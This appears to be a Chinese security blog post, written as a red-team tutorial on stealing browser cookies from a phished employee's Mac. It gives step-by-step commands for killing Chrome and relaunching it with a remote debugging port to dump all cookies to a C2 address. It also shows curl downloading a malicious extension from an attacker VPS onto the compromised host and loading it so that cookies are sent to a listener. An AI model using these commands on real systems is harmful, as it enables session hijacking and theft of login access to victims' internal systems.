【网络安全】mac浏览器密码获取难?教你两种方法,轻松解决

前言

Windows系统密码和cookie获取比较容易,用工具即可,但Mac下浏览器密码获取较难。

背景

当我们通过钓鱼等方式拿到单位员工的个人PC机时,通常需要对主机进行信息收集。而浏览器是一个重要的信息收集点。我们可以收集历史记录、书签寻找靶机。窃取密码登录SSO、内部OA等等关键系统。但是在MAC下,因为系统的安全性,想要获取密码存在比较大的困难。

在 macOS 上,Google Chrome 的加密密钥存储在 Keychain 中,需要使用用户的明文密码解锁。

在 Windows 上,Google Chrome 版本 80+ 使用使用 DPAPI 加密的 AES-256 密钥加密 cookie。解密时不需密码。

windows下密码和cookie获取比较容易,一般上工具(HackBrowserData)就行,这里不多说。mac下的浏览器密码不好获取。mac下因为系统安全性受限,使用相关工具会弹输入用户密码的框。看下面的弹窗提示,一下就暴露了,一般人也不会点允许。
1649297240_624e4758117aa78ba9232.png

因此我们得曲线救国,比如说获取cookie。这里提供两种方法:

思路一:无头浏览器远程调试

为了便于调试和自动化,chrome内核的浏览器支持远程调试,然后可以直接调用调试接口获取cookie。网上的资料几乎大都是使用–headless无头模式利用,但本人在mac pro、最新版chrome浏览器却无法复现。

使用headless无头浏览器模式会爆如下的错误:

1649297338_624e47ba9afdfadf27fea.png

在一个老外的文章里找到了原因:

1649297380_624e47e43e6a5649e2b93.png

然后curl接口,不并无相关数据显示

image.png

第一步

  1. ps aux|grep Chrome 观察浏览器是否在运行。
  2. 若浏览器在运行,执行:killall “Google Chrome” 杀掉浏览器进程
  3. 马上在第二步命令后加上–restore-last-session,还原浏览器最近浏览的选项卡。
  4. 若浏览器未在运行,直接执行第二步,获取到cookie后 杀掉进程即可

第二步

启动chrome内核浏览器,开启指定调试端口

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --user-data-dir="/Users/用户名/Library/Application Support/Google/Chrome"

1649297499_624e485b9e6147523497c.png

第三步

查看调试端口

curl -s localhost:9222/json

1649297562_624e489aa29febafe2e8c.png

第四步

使用相关websocket工具(这里为了方便演示,直接使用了插件Simple WebSocket Client****,入侵时候把调试端口用代理转发到本地,localhost改成c2 ip就好。若不想代理,命令行下websocket的相关工具还有wsc、python模块等),

从第三步获取的结果中,任选一个webSocketDebuggerUrl,发送{“id”: 1, “method”: “Network.getAllCookies”}

成功获取所有cookie

1649297601_624e48c14303d6d667473.png

【一>所有资源获取<一】
1、很多已经买不到的绝版电子书
2、安全大厂内部的培训资料
3、全套工具包
4、100份src源码技术文档
5、网络安全基础入门、Linux、web安全、攻防方面的视频
6、应急响应笔记 7、 网络安全学习路线
8、ctf夺旗赛解析
9、WEB安全入门笔记

思路二:命令行加载恶意拓展

第二个思路来源是网上看到新闻,存在chrome 恶意插件盗取用户的cookie,因此查找相关资料进行学习。

令人惊喜的是,有位师傅github有直接写好获取cookie的插件

https://github.com/saucer-man/chrome_get_cookie

因此这里我们直接调用上面的插件脚本进行利用

第一步

vps起一个flask服务器监听,接受cookies数据

1649297643_624e48eb930d42047a30c.png
1649297672_624e49088c15ff92c2931.png

第二步

使用curl或者wget下载恶意chrome插件文件夹到肉鸡电脑,

curl http://X.X.X.X/cookie.zip -o /tmp/cookie.zip unzip cookie.zip

第三步

用户未打开浏览器的情况,或我们直接杀掉浏览器进程:

killall “Google Chrome”

然后执行命令,使chromer浏览器加载我们的拓展

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --load-extension=/tmp/cookie --user-data-dir="/Users/用户名/Library/Application Support/Google/Chrome" --restore-last-session

加载后会打开chromer浏览器

1649297720_624e4938bc4d9fb0b6dc6.png

vps服务器也同步接收到了数据,保存cookie.json文件在当前目录

1649297750_624e4956095631cb5364f.png

1649297796_624e4984d5aca0fde42b8.png

用户已打开浏览器的时候,因为两个正在运行的 Chrome 实例不能共享同一个用户数据目录,因此用上面方法就行不通了。

网上有方法是把用户数据复制到另一个目录,但复现未成功,打开的是没用户数据的chrome浏览器。

首先使用cp命令复制文件夹到tmp目录

cp -R ~/Library/Application\ Support/Google/Chrome/Default ~/tmp

使用–user-data命令,指定用户数据执行命令

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --user-data-dir=~/tmp --load-extension=/Users/用户名/Desktop/tools/redteam/chrome_get_cookie

弹出来的是空白浏览器:

1649297826_624e49a2036ce0ff7519e.png

接收不到cookie

1649297859_624e49c33e2fa9b55a4aa.png

参考链接:

[tps://saucer-man.com/information_security/787.html](https://saucer-man.com/information_security/787.html)

[https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e)

[https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/](https://embracethered.com/blog/posts/2020/firefox-cookie-debug-client/)(firefox)

注意

killall “Google Chrome” 关闭chrome浏览器进程的命令

浏览器命令行相关参数:

–headless无头模式
–restore-last-session浏览器崩溃后,恢复浏览器的最近浏览的选项卡
–load-extension加载的拓展插件文件夹路径
–remote-debugging-port=xxx远程调试的端口
–user-data-dir表示加载用户浏览器数据文件夹,没有指定数据目录,打开的会是全新无痕的chrome

chrome 用户数据配置文件夹保存路径:

Mac OS X: ~/Library/Application Support/Google/Chrome/Default

Windows XP: Documents and SettingsusernameLocal SettingsApplication DataGoogleChromeUser DataDefault

Windows 7: C:\Users\xxx\AppData\Local\Google\Chrome\User Data\Default

Linux: ~/.config/google-chrome/Default

Ubuntu: ~/.config/google-chrome 或 ~/.config/chromium
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值